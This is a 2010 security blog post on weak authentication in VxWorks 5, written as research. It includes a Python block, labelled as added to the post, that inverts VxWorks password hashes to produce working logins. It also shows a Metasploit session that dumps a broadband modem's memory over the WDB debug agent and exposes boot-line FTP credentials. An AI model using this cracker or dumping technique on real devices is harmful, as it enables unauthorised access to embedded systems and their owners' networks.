Wednesday, September 01, 2010

Follow-up on VxWorks issue

Introduction

As a follow-up to H. D. Moore's research on VxWorks, I would like to share some personal thoughts on the matter.

I happen to have some experience with VxWorks, since this operating system used to be quite popular among broadband modem manufacturers, and I have always been fascinated by those SpyBoxes.

VxWorks software is now easier to get hold of, since trial/evaluation versions are readily available. Back in the days of VxWorks 5 (and older), things were trickier.

HDM pointed out that the VxWorks source code leaked on the PUDN Web site. As a rule of thumb, most of the world's intellectual property can be found on the Chinese Internet. There are, however, many other ways to browse the source (warning: all links below might disappear from the Internet without notice).
  • Universities and student projects [1]
  • Training courses [1]
  • VxWorks enthusiasts [1] [2] [3]
  • Third-party SDKs (for systems that have been built on the top of VxWorks) [1]
  • Hardware hackers [1]
In the end, whatever you are looking for, the Internet has it :)

Authentication

Now let's have a look at the VxWorks authentication mechanism (described here and here).


Quoting usrConfig.c:

    (…)
        loginInit ();                                 /* initialize login table */
        shellLoginInstall (loginPrompt, NULL);        /* install security program */

        /* add additional users here as required */

        loginUserAdd (LOGIN_USER_NAME, LOGIN_PASSWORD);
        }
    #endif /* INCLUDE_SECURITY */

        printLogo ();                                 /* print out the banner page */
        printf (" ");
        printf ("CPU: %s. Processor #%d.\n", sysModel (), sysProcNumGet ());
        printf (" ");
        printf ("Memory Size: 0x%x.", sysMemTop () - (char *)LOCAL_MEM_LOCAL_ADRS);
        printf (" BSP version %s.\n\n", bspVersion ());
    (…)

Authentication is optional: INCLUDE_SECURITY must be defined at compile time, otherwise the login program is never installed and the shell comes up without any prompt for credentials.

User accounts are created dynamically, by calling loginUserAdd() once per account; there is no user/password "file" (there might be no filesystem at all on the target system), so with the default configuration the account ends up as a pair of constants compiled into the image.

The password is "encrypted" with a VxWorks-proprietary one-way function. Quoting http://www.xs4all.nl/~borkhuis/vxworks/vxw_pt1.html:

    "Q: How can I create (encrypted) passwords?
    A: You can use vxencrypt that comes with Tornado to create passwords, but it is pretty weak.
    I think it is sum( p[i] * i ^ i )) * 0x1e3a1d5 converted to ascii with a munged hex character set (presumably to make you think there are more than 2^32 encrypted passwords). I think I could reverse that using pen and paper."
Therefore it is possible to log into a VxWorks 5 system that still uses this default configuration (accounts created at build time with loginUserAdd()) by following these steps:

  • Grab a copy of the firmware (more about this later)
  • Find the banner printing code
  • Look a few instructions earlier: you will presumably find the call(s) to loginUserAdd(), with the user name and the "encrypted" password as arguments
  • Reverse the passwords (using pen and paper ;)
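
The algorithm the quote sketches, as an added example written for this post (it is not code from the post, from VxWorks or from Tornado): a Python re-implementation of the VxWorks 5 loginDefaultEncrypt() routine from loginLib.c, i.e. what vxencrypt computes, followed by a preimage search that performs the "pen and paper" step of the list above. The constant 31695317 is the 0x1e3a1d5 of the quote; the final remapping of decimal digits onto the letters QRSbcdeyz9 and the 8..40 character length check are taken from loginLib.c rather than from this page, and the input "password" is a constructed example.

```python
# Added example, not code from the post. VxWorks 5 loginDefaultEncrypt() from
# loginLib.c, re-implemented in Python, plus a preimage search that shows why
# the quote above calls it "pretty weak". The constant is the 0x1e3a1d5 of the
# quote; the digit "munging" and the 8..40 length check follow loginLib.c.

MAGIC = 31695317               # 0x1e3a1d5, odd, hence invertible mod 2**32
MASK = 0xFFFFFFFF              # `unsigned long` wraps at 32 bits on the target
PRINTABLE = range(0x21, 0x7F)  # characters a user can type at the login prompt


def _term(c, k):
    """One term of the sum: (in[ix] * (ix + 1)) ^ (ix + 1), with k = ix + 1."""
    return (c * k) ^ k


def _munge(digits):
    """Map the decimal digits onto the 10-letter alphabet QRSbcdeyz9."""
    out = []
    for ch in digits:
        c = ord(ch)
        if c < ord("3"):
            c += ord("!")
        if c < ord("7"):
            c += ord("/")
        if c < ord("9"):
            c += ord("B")
        out.append(chr(c))
    return "".join(out)


_UNMUNGE = {m: d for d, m in zip("0123456789", _munge("0123456789"))}


def vx_encrypt(password):
    """Equivalent of vxencrypt / loginDefaultEncrypt() on VxWorks 5."""
    if not 8 <= len(password) <= 40:
        raise ValueError("VxWorks 5 only accepts 8..40 character passwords")
    total = sum(_term(c, k) for k, c in enumerate(password.encode("latin-1"), 1))
    return _munge(str((total * MAGIC) & MASK))


def recover_sum(vx_hash):
    """Undo the munging and the multiplication. The weighted sum comes back
    exactly: for a password of at most 40 characters it is far below 2**32."""
    n = int("".join(_UNMUNGE[ch] for ch in vx_hash))
    return (n * pow(MAGIC, -1, 2**32)) & MASK


def find_preimage(vx_hash):
    """Return some printable password (8..40 chars) whose hash is vx_hash.

    Positions are filled from the highest weight down; the exact min/max of
    the remaining positions prunes the search, so it rarely backtracks.
    """
    target = recover_sum(vx_hash)
    # per position k: every reachable term value -> one character producing it
    tables = [{_term(c, k): c for c in PRINTABLE} for k in range(1, 41)]
    lo, hi = [0], [0]          # bounds of the sum over positions 1..k
    for t in tables:
        lo.append(lo[-1] + min(t))
        hi.append(hi[-1] + max(t))

    def search(chars, k, remaining):
        if k == 0:
            return remaining == 0
        if not lo[k] <= remaining <= hi[k]:
            return False
        for value, c in tables[k - 1].items():
            chars[k - 1] = c
            if search(chars, k - 1, remaining - value):
                return True
        return False

    for length in range(8, 41):
        chars = [0] * length
        if search(chars, length, target):
            return bytes(chars).decode("latin-1")
    raise ValueError("no printable preimage found")


if __name__ == "__main__":
    h = vx_encrypt("password")     # constructed example input
    print(h)                       # RcQbRbzRyc
    p = find_preimage(h)
    print(repr(p), vx_encrypt(p) == h)
```

Running it prints RcQbRbzRyc for "password" and then a second, unrelated-looking printable string with the very same hash. Two properties make the inversion this easy: the multiplication by an odd constant modulo 2^32 is a bijection, so multiplying by its inverse gives the weighted sum back exactly (with at most 40 characters the sum never comes near 2^32), and that sum for an 8-character password lies roughly between 1150 and 4550, so there are only a few thousand distinct hashes to begin with. Since the login check compares "encrypted" strings, any preimage found this way is accepted by the shell.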

Practical use case

Let's take the Trio3C broadband modem that was widely distributed by Neuf Telecom a few years ago. It has since been superseded by the NeufBox4, and second-hand units can be found for less than 5 euros nowadays. The Trio3C appears to be running VxWorks 5 with the WDB remote debugging agent enabled, which is what the Metasploit wdbrpc modules talk to.

$ ./msfconsole

                _                  _       _ _
               | |                | |     (_) |
 _ __ ___   ___| |_ __ _ ___ _ __ | | ___  _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | |  __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
                            | |
                            |_|


       =[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 584 exploits - 297 auxiliary
+ -- --=[ 219 payloads - 27 encoders - 8 nops
       =[ svn r10182 updated today (2010.08.29)

msf > use auxiliary/scanner/vxworks/wdbrpc_bootline

msf auxiliary(wdbrpc_bootline) > set RHOSTS 192.168.1.1/32
RHOSTS => 192.168.1.1/32

msf auxiliary(wdbrpc_bootline) > run

[*] 192.168.1.1: VxWorks5.4.2 Centillium Palladia 4K
[*] 192.168.1.1: BOOT: tffs=0,0(0,0)host:/tffs/vxworks.s e=192.168.1.4:0xffffff00 h=192.168.1.10 u=p220 pw=p220
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf auxiliary(wdbrpc_bootline) > use auxiliary/admin/vxworks/wdbrpc_memory_dump

msf auxiliary(wdbrpc_memory_dump) > set RHOST 192.168.1.1
RHOST => 192.168.1.1

msf auxiliary(wdbrpc_memory_dump) > set LPATH /tmp/memory.dmp
LPATH => /tmp/memory.dmp

msf auxiliary(wdbrpc_memory_dump) > run

[*] Attempting to dump system memory...
[*] 192.168.1.1 Connected to VxWorks5.4.2 - Centillium Palladia 4K ()
[*] Dumping 0x00fef800 bytes from base address 0x80000000 at offset 0x00000000...
[*] [ 00 % ] Downloaded 0x00000b18 of 0x00fef800 bytes (complete at Sun Aug 29 09:55:11 +0200 2010)
[*] [ 00 % ] Downloaded 0x000010a4 of 0x00fef800 bytes (complete at Sun Aug 29 09:55:34 +0200 2010)
(...)
[*] Dumped 0x00fefba0 bytes.
[*] Auxiliary module execution completed

The complete memory dump loads and disassembles cleanly in IDA Pro [*] (the base address of the dump, 0x80000000, is kindly provided by the debugger).


Unfortunately for the demo, no hardcoded account is to be found in this image: user accounts and (cleartext) passwords are stored in a configuration file rather than compiled in through loginUserAdd(). The boot line does expose the FTP user and password the target uses towards its boot host (u=p220 pw=p220), but that is not a shell account. Still, that was a fun exercise anyway :)



[*] Actually not, I had to request a patch for the MIPS processor module :)

3 comments:

Anonymous said...

Hey,

This is a message for the webmaster/admin here at www.blogger.com.

May I use part of the information from your post above if I provide a link back to this site?

Thanks,
John

Anonymous said...

The request for permission to post information with the promise of a link is bogus.

I have received several identical requests at my blog, although the name of the requester varies (James, John, Thomas etc.)

There is a similar message saying "thanks for sharing this link, but unfortunately it seems to be not working; does anybody here at ... ... have a mirror or another source? Cheers, (James, John, Thomas or whoever)".

newsoft said...

Thank you for the feedback. I still fail to see the scheme behind those "spam" comments ...